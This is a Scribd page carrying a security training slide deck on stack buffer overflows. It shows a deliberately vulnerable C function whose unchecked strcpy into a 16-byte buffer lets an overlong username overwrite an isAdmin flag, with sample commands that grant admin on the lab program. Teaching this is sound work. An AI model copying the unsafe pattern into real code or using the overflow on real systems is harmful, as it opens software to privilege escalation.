Scribd Logo
Upload

Welcome to Scribd!

  • 0x41 BufferOverflow

    Uploaded by

    Ahmed
    18K views23 pages
    This document discusses stack buffer overflows. It explains the memory layout of functions, how C arrays work, and how buffer overflows can be exploited locally or remotely. It provides an example of a vulnerable function called handleData() that contains a buffer and integer variable. By passing a long string as input, an attacker can overwrite the integer's value and gain administrative privileges. The document also shows how buffer overflows work by overwriting memory addresses one by one until the return address is modified.

    Original Description:

    Original Title

    0x41_BufferOverflow

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document discusses stack buffer overflows. It explains the memory layout of functions, how C arrays work, and how buffer overflows can be exploited locally or remotely. It provides an example of a vulnerable function called handleData() that contains a buffer and integer variable. By passing a long string as input, an attacker can overwrite the integer's value and gain administrative privileges. The document also shows how buffer overflows work by overwriting memory addresses one by one until the return address is modified.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    18K views23 pages

    0x41 BufferOverflow

    Uploaded by

    Ahmed
    This document discusses stack buffer overflows. It explains the memory layout of functions, how C arrays work, and how buffer overflows can be exploited locally or remotely. It provides an example of a vulnerable function called handleData() that contains a buffer and integer variable. By passing a long string as input, an attacker can overwrite the integer's value and gain administrative privileges. The document also shows how buffer overflows work by overwriting memory addresses one by one until the return address is modified.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 23

    Stack Buffer Overflow

    1
    Content

    Intel Architecture

    Memory Layout Buffer Overflow

    C Arrays
    BoF Exploit

    Assembler
    Remote Exploit

    Shellcode
    Exploit Mitigations
    Function Calls

    Debugging Defeat Exploit Mitigations


    2
    Buffer Overflow
    Without exploit

    3
    Buffalo Overflow

    4
    Buffer Overflow

    ▪ Challenge9
    # ./challenge9 <username> <password>

    # ./challenge9 someusername somepassword


    You are not admin.
    isAdmin: 0x0

    5
    Buffer Overflow

    void handleData(char *username, char *password) {


    int isAdmin = 0;
    char firstname[16];

    isAdmin = checkPassword(password);
    strcpy(firstname, username);

    if(isAdmin > 0) {
    printf("Hello %s.\nYou are admin!\n”, name);
    printf(“isAdmin: 0x%x\n", isAdmin);
    } else {
    printf("Hello %s.\nYou are not admin.\n”, name);
    printf(“isAdmin: 0x%x\n", isAdmin);
    }
    }
    6
    Buffer Overflow

    const char *adminHash = "$6$saaaaalty$cjw9qyA..";

    int checkPassword(char *password) {


    char *hash;

    hash = crypt(password, "$6$saaaaalty");

    if (strcmp(hash, adminHash) == 0) {
    return 1;
    } else {
    return 0;
    }
    }
    7
    Buffer Overflow
    &password
    &username
    SIP
    SFP Stack Frame
    <handleData>
    isAdmin
    firstname[16]

    push pop

    8
    Buffer Overflow - Basic Layout

    char firstname[16] isAdmin

    strcpy(firstname, “AAAA AAAA AAAA AAAA”);

    AAAA AAAA AAAA AAAA 0


    Write up

    9
    Buffer Overflow - Basic Layout

    char firstname[16] isAdmin

    strcpy(firstname, “AAAA AAAA AAAA AAAA B”);

    AAAA AAAA AAAA AAAA B

    Write up

    10
    Buffer Overflow: handleData()

    void handleData(char *username, char *password) {


    int isAdmin = 0;
    char firstname[16];
    (0)
    isAdmin = checkPassword(password);
    (1)
    strcpy(firstname, username);
    (2)
    if(isAdmin > 0) {
    printf(“isAdmin: 0x%x\n", isAdmin);
    } else {
    printf(“isAdmin: 0x%x\n", isAdmin);
    }
    }

    11
    Buffer Overflow

    char firstname[16] isAdmin

    12
    Buffer Overflow

    char firstname[16] isAdmin

    0 <undefined> <undef>

    13
    Buffer Overflow

    char firstname[16] isAdmin

    0 <undefined> <undef>

    1 <undefined> 0x00000000

    14
    Buffer Overflow

    char firstname[16] isAdmin

    0 <undefined> <undef>

    1 <undefined> 0x00000000

    2 AAAAAAAAAAAAAAAAAAAAA 0x00000000

    15
    Buffer Overflow

    char firstname[16] isAdmin

    0 <undefined> <undef>

    1 <undefined> 0x00000000

    2 AAAAAAAAAAAAAAAAAAAAA 0x00000000

    2 AAAAAAAAAAAAAAAAAAAAA 0x00000041
    16
    Buffer Overflow

    2 AAAAAAAAAAAAAAA 0x00 0x00 0x00 0x00

    17
    Buffer Overflow

    2 AAAAAAAAAAAAAAA 0x00 0x00 0x00 0x00

    2 AAAAAAAAAAAAAAA A 0 0 0

    18
    Buffer Overflow

    2 AAAAAAAAAAAAAAA 0x00 0x00 0x00 0x00

    2 AAAAAAAAAAAAAAA A 0 0 0

    2 AAAAAAAAAAAAAAA 0x41 0x00 0x00 0x00

    19
    Buffer Overflow

    ./challenge9 compass superpassword


    You are not admin.

    ./challenge9 0123456789012345679012345678 test


    You are not admin.

    ./challenge9 0123456789012345679012345678A test


    You ARE admin!
    isAdmin: 0x41

    ./challenge9 0123456789012345679012345678AB test


    You ARE admin!
    isAdmin: 0x4241

    20
    Buffer Overflow
    Recap:
    ▪ Local variables of a function (buffers) are allocated adjectant to each other
    ▪ One after another, as written in the source code (first initialized first allocated)

    21
    Buffer Overflow

    22
    References
    References:
    ▪ https://www.uperesia.com/buffer-overflow-explained
    ▪ https://www.youtube.com/watch?v=1S0aBV-Waeo Buffer Overflow Attack - Computerphile

    23

    You might also like